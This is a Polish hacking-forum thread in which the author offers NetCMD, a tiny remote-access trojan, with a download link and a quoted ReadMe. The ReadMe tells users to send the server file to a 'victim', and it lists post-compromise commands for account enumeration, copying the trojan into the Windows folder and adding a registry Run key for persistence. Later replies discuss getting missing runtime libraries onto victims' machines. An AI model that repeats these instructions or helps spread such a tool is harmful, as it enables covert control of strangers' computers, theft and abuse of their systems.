NetCMD

[Amidamaru]

Witam Was! Zapraszam do oceny mojego najnowszego dzieła

A mianowicie NetCMD


Jego zaletą jest rozmiar: 8,5 kb - klient i 8,5 kb - serwer.


Można go pobrać stąd: http://www.sendspace.com/file/ltls5c (po ok. 5 sekundach na kole pojawi się link do pobrania).

Oczekuje wszelkich komentarzy, uwag i propozycji!


Tutaj cytat z pliku ReadMe.txt jako opis:

Witaj w pliku ReadMe programu NetCMD.

Autor: Amidamaru.

Oczekuje wszelakich komentarzy, uwag i propozycji! Mój mail: [email protected]



PROGRAM STWORZONY DO CELÓW EDUKACYJNYCH.







1. O plikach
__________________________________________________ __________________________________________________ ________



Program jest bardzo prostym programem do zdalnego zarządzania komputerem, bez świadomości drugiej strony - czyli poprostu trojanem

NIEOTWIERAJ PLIKU srv.exe ! Jest to plik dla ofiary!
Plik cli.exe natomiast służy do zdalnego sterowania.


Największą zaletą programu jest pojemność:
- plik srv.exe ma 8,5 kb
- plik cli.exe ma też 8,5 kb
Po spakowaniu razem mają 12,9 kb.

Przede wszystkim uzyskano taki wynik poprzez:
- Spakowanie pliku srv.ex oraz cli.exe programem UPX w najlepszej możliwej kompresji
- Spakowanie obu plików do archiwum RAR-a (pliki.rar) o najwyższym stopniu kompresji

Po dokładnym przeczytaniu pliku ReadMe.txt (czyli tego) i doshelp.txt możesz posługiwać się samym archiwum pliki.rar.

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_










2. Zaczynamy!
__________________________________________________ __________________________________________________ ________


Program nie wymaga żadnej konfiguracji. Działa na stałym porcie i ma jednolitne ustawienia.
Aby więc zacząć musisz tylko podesłać ofiarze plik srv.exe i poznać jej IP (np. poprzez Gadu-Gadu).
Następnie odpalasz u siebie plik cli.exe. W pole IP: wpisujesz oczywiście IP ofiary i klikasz Enter.
Czekasz na połączenie.
Gdy zostaniesz połączony możesz już wykonywać zdalnie komendy na komputerze ofiary!

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_










3. Podstawy
__________________________________________________ __________________________________________________ ________

Od razu powiem, że program nie jest dla lamerów, którzy uważają się za wielkich haksi0rów :/ Nie ma tu żadnych fajnych zabaweczek. Czysta linia komend. Jednak bardziej doświadczeni zapewne wiedzą, że przez CMD można zrobić praktycznie WSZYSTKO!

Moja propozycja jak zacząć wygląda tak:
a) wpisjemy systeminfo, aby zobaczyć co w kompie gra
b) wpisujemy net user, a potem net user Administrator, aby zorientować się jakie posiada konta oraz czy Administrator ma hasło i czy można je zmienić
c) teraz proste copy "ścieżka_trojana" "C:\Windows\jakas_fajna_nazwa.exe", żeby skopiować naszego trojanika do folderu Windowsa
d) czas dodać trojana do autostartu. Uzyskamy to za pomocą edytora rejestru pod CMD, wpisujemy: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NazwaWAutostarcie /t REG_SZ /d C:\Windows\NazwaPodJakaSkopiowalismyTrojana.exe

Po tych czynnościach jesteśmy niejako "zabezpieczeni" i możemy kontynuować...


Proszę przed wyłączeniem programu wpisać w linię komen ofiary polecenie exit !! (Inaczej proces CMD.EXE nie zostanie zakończony)
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_









4. Postanowienia końcowe
__________________________________________________ __________________________________________________ ________

Pamiętaj, że mogę być problemy z połączeniem jeżeli ofiara:
- znajduje się za NAT-em
- posiada firewall (nawet czasem Windowsowy blokuje)
- posiada antywirua z bardzo wysokim stopniem filtracji (może wykryć, że program był kompresowany, co czasami zostaje uznane za wirusa)

Pamiętaj: używasz programu na własną odpowiedzialność

Autor: AMIDAMARU.

Licencja: freeware.
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_




NetCMD



Rozmiarówka:
ReadMe.txt - 4,36 kb
doshelp.txt - 16,1 kb
pliki.rar - 12,9 kb
cli.exe - 8,5 kb
NetCMD.rar - 20,8 kb
srv.exe - 8,5 kb

Co o nim sądzicie...?

Pozdrawiam!

[31337]

rozmiar 22 kB, jestem pelen podziwu ze 'tylko' tyle piszac w delphi
zrobiles prawie to czego ja nie potrafilem, chyba

niestety nie moge go przetestowac:

(przy obu plikach tak samo)

[studencik20]

podejżewam, ze aplikacja dziala i wlasnie ja testujesz

[31337]

obawiam sie ze nie, no chyba ze to taki wypasiony exploit ktory podpina sie pod pamiec procesow systemowych i maskuje swoje polaczenie.

[Amidamaru]

Witam!

Czy ktoś ma podobny problem jak 31337

I czy działa Ci ta wersja, którą przesyłam w załączniku

[31337]

tez nie dziala.
wlasnie znalazlem info ze to brak frameworka
good job! pisac trojany pod frameworka

[Amidamaru]

Tak, racja!

Aby mieć frameworka trzeba pobrać te dwa piki i je do #system# wrzucić (np. C:\Windows\system32):
http://addenda.webtek.opole.pl/pliki/vcl70.zip
http://addenda.webtek.opole.pl/pliki/rtl70.zip
wtedy wszystkie programy pod framework śmigają

[TQM]

W takim razie wrzucajac to komus trzeba go poprosic o dogranie plikow :P

[Exc0mmunion]

Albo skompilować z odpowiednią opcją (modułem) w delphi. Robiłem tak jak pisałem programy w tym języku, i problem znikał (powiększał sie rozmiar pliku wynikowego)

[Amidamaru]

Niee Chodzi o to, że specjalnie jest tak skompilowany... Niestety - jeżeli "ofiara" nie ma frameworka to musimy załączyć tamte pliki... Jednak większość osób posiada go wgranego i u nich malutki trojan będzie działał